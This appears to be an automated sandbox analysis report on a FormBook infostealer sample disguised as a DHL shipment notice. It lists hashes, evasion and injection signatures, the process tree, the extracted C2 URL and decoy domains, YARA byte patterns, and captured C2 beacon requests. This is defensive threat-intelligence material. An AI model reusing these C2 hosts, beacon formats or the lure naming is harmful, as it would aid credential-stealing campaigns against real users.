Windows Analysis Report
DHL SHIPMENT NOTIFICATION 1146789443.exe

Overview

General Information

Sample Name: DHL SHIPMENT NOTIFICATION 1146789443.exe
Analysis ID: 626119
MD5: 8fbdf9f70b21179d87b83fe47b2137dd
SHA1: 146eebe16adad9486cac66f4574810cec1f56cbb
SHA256: 972bc525f6be5f7281a72ec4887cc5b85f4b064463bba234f1258c967b164026
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • DHL SHIPMENT NOTIFICATION 1146789443.exe (PID: 6224 cmdline: "C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe" MD5: 8FBDF9F70B21179D87B83FE47B2137DD)
    • aeokw.exe (PID: 6272 cmdline: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok MD5: 6F70881E0183CE9F78E300CF2C8DC48E)
      • aeokw.exe (PID: 6288 cmdline: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok MD5: 6F70881E0183CE9F78E300CF2C8DC48E)
        • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • svchost.exe (PID: 2360 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
            • cmd.exe (PID: 6308 cmdline: /c del "C:\Users\user\AppData\Local\Temp\aeokw.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 1524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.lgf7.com/amdf/"], "decoy": ["xadazheng.com", "bremorgan.com", "keilaniclothing.com", "du9a20ofolvhfr.xyz", "santamariacourt.com", "wcagls.com", "visionuptechnology.com", "sddysrq.com", "pencetslot.site", "wpcoisas.com", "caomei08.xyz", "infinitepotential.xyz", "anotherchanceranch.net", "ymterp.com", "zhuyunming.com", "elementarymodel.com", "edmondsonfinancial.com", "adsnethosting.com", "obohsan-souzokusindan.tech", "helicopterart.com", "shangnuanjia.com", "89660.world", "zkzxconsulting.com", "temp-bait.com", "8562.pet", "taojinwa.net", "chatterboxtwo.com", "pejoki.com", "effectual-science.com", "ma3721.com", "b498gszj.com", "sicuumon.com", "northwtb.com", "reconbattery.xyz", "sibirerzucht.com", "fusionpsychiatry.net", "biblicalguidance.net", "liquated99tic.com", "ruvinslimshop.com", "attjeans.com", "reservedadseyelevel.com", "theselungs.com", "safe-edd-centerhelp92.com", "provercoop.com", "216498.com", "bbqautopilot.com", "nurhurdacilik.com", "zo177.wales", "doublemsporthorses.com", "hl308.com", "movewhenyouwant.com", "smartinvestorsguide.com", "joga-wroclaw.com", "potionsparchment.com", "rtpholywin99.com", "sosocean.com", "vliralip.com", "alphaomegamerch.net", "pallettruckload.com", "spritzdao.xyz", "unbound-soul.com", "enssale.xyz", "capitalisllc.com", "ultrakill.xyz"]}
Source | Rule | Description | Author | Strings
00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x16a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x1191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x17a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x191f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x40c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x78e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x88ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x4809:$sqlite3step: 68 34 1C 7B E1
    • 0x491c:$sqlite3step: 68 34 1C 7B E1
    • 0x4838:$sqlite3text: 68 38 2A 90 C5
    • 0x495d:$sqlite3text: 68 38 2A 90 C5
    • 0x484b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x4973:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Source | Rule | Description | Author | Strings
      2.0.aeokw.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        2.0.aeokw.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.0.aeokw.exe.400000.8.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x17a09:$sqlite3step: 68 34 1C 7B E1
        • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a38:$sqlite3text: 68 38 2A 90 C5
        • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
        1.2.aeokw.exe.12a0000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          1.2.aeokw.exe.12a0000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          No Sigma rule has matched
          No Snort rule has matched

          AV Detection

          Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, Malware Configuration Extractor: FormBook
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exe, Virustotal: Detection: 42%
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exe, ReversingLabs: Detection: 48%
          Source: Yara match, File source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: http://www.rtpholywin99.com/amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBx, Avira URL Cloud: Label: malware
          Source: www.lgf7.com/amdf/, Avira URL Cloud: Label: malware
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exe, Joe Sandbox ML: detected
          Source: 2.0.aeokw.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.aeokw.exe.12a0000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.aeokw.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.aeokw.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.aeokw.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\mvbaz\xgpqcu\xwqn\f27888ddf02c4c6aa9eb1b8f5b3a0302\rlifld\nwoxnqyr\Release\nwoxnqyr.pdb source: DHL SHIPMENT NOTIFICATION 1146789443.exe, 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmp, aeokw.exe, 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, aeokw.exe, 00000001.00000000.249383523.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, aeokw.exe, 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, svchost.exe, 00000011.00000002.515611102.000000000352F000.00000004.10000000.00040000.00000000.sdmp, nsk2671.tmp.0.dr, aeokw.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: aeokw.exe, 00000001.00000003.255155254.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000001.00000003.254132987.000000001ADE0000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000002.00000003.260122291.00000000012DE000.00000004.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322328355.0000000001470000.00000040.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322514089.000000000158F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.322000917.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.323291458.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aeokw.exe, 00000001.00000003.255155254.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000001.00000003.254132987.000000001ADE0000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000002.00000003.260122291.00000000012DE000.00000004.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322328355.0000000001470000.00000040.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322514089.000000000158F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.322000917.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.323291458.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: aeokw.exe, 00000002.00000002.322286626.00000000011DA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: aeokw.exe, 00000002.00000002.322286626.00000000011DA000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe, Code function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D7A
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe, Code function: 0_2_004069A4 FindFirstFileW,FindClose, 0_2_004069A4
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe, Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe, Code function: 4x nop then pop ebx, 2_2_00407B1B
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe, Code function: 4x nop then pop edi, 2_2_0040E472
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then pop ebx, 17_2_02387B1B
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then pop edi, 17_2_0238E472

          Networking

          Source: C:\Windows\explorer.exe, Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe, Domain query: www.ultrakill.xyz
          Source: C:\Windows\explorer.exe, Network Connect: 3.64.163.50 80
          Source: C:\Windows\explorer.exe, Network Connect: 142.250.185.115 80
          Source: C:\Windows\explorer.exe, Domain query: www.rtpholywin99.com
          Source: C:\Windows\explorer.exe, Domain query: www.keilaniclothing.com
          Source: C:\Windows\explorer.exe, DNS query: www.ultrakill.xyz
          Source: Malware configuration extractor, URLs: www.lgf7.com/amdf/
          Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox View, ASN Name: AMAZON-02US AMAZON-02US
          Source: global traffic, HTTP traffic detected: GET /amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBx HTTP/1.1, Host: www.rtpholywin99.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /amdf/?9rF=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1Udvzfmdn1m&oTsXW=bHtTbh8HU HTTP/1.1, Host: www.keilaniclothing.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /amdf/?oTsXW=bHtTbh8HU&9rF=2pnwrPnaayjLTa+dMDr3ioSS0RS/WyH1Gjote8OZi1oxTz0HZpyyfRSy0TFJ31yfLnqh HTTP/1.1, Host: www.ultrakill.xyz, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: Joe Sandbox View, IP Address: 23.227.38.74 23.227.38.74
          Source: global traffic, HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Content-Type: text/html; charset=UTF-8
            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
            Pragma: no-cache
            Expires: Mon, 01 Jan 1990 00:00:00 GMT
            Date: Fri, 13 May 2022 14:10:37 GMT
            X-Content-Type-Options: nosniff
            X-XSS-Protection: 1; mode=block
            Server: GSE
            Accept-Ranges: none
            Vary: Accept-Encoding
            Transfer-Encoding: chunked
            Connection: close
          Source: global traffic, HTTP traffic detected:
            HTTP/1.1 403 Forbidden
            Date: Fri, 13 May 2022 14:10:57 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            X-Sorting-Hat-PodId: 250
            X-Sorting-Hat-ShopId: 64045383931
            X-Dc: gcp-europe-west1
            X-Request-ID: c795f513-2a89-4e29-a885-b65e0c1175bd
            X-XSS-Protection: 1; mode=block
            X-Download-Options: noopen
            X-Content-Type-Options: nosniff
            X-Permitted-Cross-Domain-Policies: none
            CF-Cache-Status: DYNAMIC
            Server: cloudflare
            CF-RAY: 70abfb06ecb2917d-FRA
            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exe, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: svchost.exe, 00000011.00000002.515898561.0000000003A1F000.00000004.10000000.00040000.00000000.sdmp, String found in binary or memory: http://www.ultrakill.xyz/
          Source: unknown, DNS traffic detected: queries for: www.rtpholywin99.com
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe, Code function: 0_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_0040580F

          E-Banking Fraud

          Source: Yara match, File source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
